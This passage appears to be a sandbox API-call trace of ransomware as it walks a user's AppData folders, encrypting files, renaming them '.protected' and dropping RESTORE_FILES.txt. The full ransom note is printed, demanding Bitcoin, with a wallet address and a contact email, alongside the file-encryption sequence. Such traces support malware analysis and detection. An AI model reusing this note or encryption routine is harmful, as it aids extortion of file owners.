[0078.202] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.202] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.202] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.202] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.202] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.202] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.202] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\..") returned 61 [0078.202] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.202] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.202] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0078.202] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0078.202] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\RESTORE_FILES.txt") returned 76 [0078.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\deployment\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0078.203] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.203] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0078.203] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.203] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0078.203] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.203] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0078.204] CloseHandle (hObject=0xd4) returned 1 [0078.204] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="Windows") returned -1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="Program Files") returned -1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="Program Files (x86)") returned -1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="$Recycle.bin") returned 1 [0078.204] lstrcmpiW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="System Volume Information") returned -1 [0078.204] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 67 [0078.205] StrStrIW (lpFirst="GDIPFONTCACHEV1.DAT", lpSrch=".protected") returned 0x0 [0078.205] lstrcmpW (lpString1="GDIPFONTCACHEV1.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0078.205] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0078.205] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0078.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0078.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 67 [0078.205] StrStrW (lpFirst="GDIPFONTCACHEV1.DAT", lpSrch=".txt") returned 0x0 [0078.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 67 [0078.205] StrStrW (lpFirst="GDIPFONTCACHEV1.DAT", lpSrch=".rar") returned 0x0 [0078.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT") returned 67 [0078.205] StrStrW (lpFirst="GDIPFONTCACHEV1.DAT", lpSrch=".zip") returned 0x0 [0078.205] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0078.221] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.221] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0078.221] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.221] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0078.222] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0078.222] CloseHandle (hObject=0xd4) returned 1 [0078.222] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.protected") returned 77 [0078.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.protected")) returned 1 [0078.223] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="Windows") returned -1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="Program Files") returned -1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="Program Files (x86)") returned -1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="$Recycle.bin") returned 1 [0078.223] lstrcmpiW (lpString1="Google", lpString2="System Volume Information") returned -1 [0078.223] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google") returned 54 [0078.223] lstrcmpW (lpString1="Google", lpString2=".") returned 1 [0078.223] lstrcmpW (lpString1="Google", lpString2="..") returned 1 [0078.223] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*") returned 56 [0078.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0078.224] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.224] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.224] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.224] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.224] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.224] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\.") returned 56 [0078.224] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.224] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.224] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.224] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.224] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.224] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.224] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.224] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\..") returned 57 [0078.224] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.224] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.224] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.224] lstrcmpiW (lpString1="Chrome", lpString2="Windows") returned -1 [0078.224] lstrcmpiW (lpString1="Chrome", lpString2="Program Files") returned -1 [0078.224] lstrcmpiW (lpString1="Chrome", lpString2="Program Files (x86)") returned -1 [0078.224] lstrcmpiW (lpString1="Chrome", lpString2="$Recycle.bin") returned 1 [0078.224] lstrcmpiW (lpString1="Chrome", lpString2="System Volume Information") returned -1 [0078.224] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome") returned 61 [0078.224] lstrcmpW (lpString1="Chrome", lpString2=".") returned 1 [0078.224] lstrcmpW (lpString1="Chrome", lpString2="..") returned 1 [0078.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*") returned 63 [0078.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0078.225] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.225] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.225] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.225] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.225] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\.") returned 63 [0078.225] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.225] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.225] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.225] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.225] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.225] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.225] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\..") returned 64 [0078.225] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.225] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.225] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="Windows") returned -1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="Program Files") returned 1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="Program Files (x86)") returned 1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="$Recycle.bin") returned 1 [0078.225] lstrcmpiW (lpString1="User Data", lpString2="System Volume Information") returned 1 [0078.225] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 71 [0078.225] lstrcmpW (lpString1="User Data", lpString2=".") returned 1 [0078.225] lstrcmpW (lpString1="User Data", lpString2="..") returned 1 [0078.226] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*") returned 73 [0078.226] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0078.238] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.238] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.238] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.238] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.238] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.238] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\.") returned 73 [0078.238] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.238] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.239] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.239] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.239] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.239] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.239] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.239] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\..") returned 74 [0078.239] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.239] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.239] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="Windows") returned -1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="Program Files") returned -1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="Program Files (x86)") returned -1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="$Recycle.bin") returned 1 [0078.239] lstrcmpiW (lpString1="CertificateTransparency", lpString2="System Volume Information") returned -1 [0078.239] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency") returned 95 [0078.239] lstrcmpW (lpString1="CertificateTransparency", lpString2=".") returned 1 [0078.239] lstrcmpW (lpString1="CertificateTransparency", lpString2="..") returned 1 [0078.240] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*") returned 97 [0078.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.240] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.240] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.240] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.240] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.240] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.240] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\.") returned 97 [0078.240] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.240] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.241] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.241] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.241] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.241] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.241] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.241] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\..") returned 98 [0078.241] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.241] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.241] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0078.241] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0078.241] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\RESTORE_FILES.txt") returned 113 [0078.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0078.241] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.241] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0078.242] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.242] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0078.242] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.242] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0078.242] CloseHandle (hObject=0x150) returned 1 [0078.242] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="Windows") returned -1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="Program Files") returned -1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="Program Files (x86)") returned -1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="$Recycle.bin") returned 1 [0078.242] lstrcmpiW (lpString1="Crashpad", lpString2="System Volume Information") returned -1 [0078.242] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 80 [0078.242] lstrcmpW (lpString1="Crashpad", lpString2=".") returned 1 [0078.242] lstrcmpW (lpString1="Crashpad", lpString2="..") returned 1 [0078.242] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*") returned 82 [0078.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.243] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.243] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.243] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.243] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.243] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.243] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\.") returned 82 [0078.243] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.243] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: 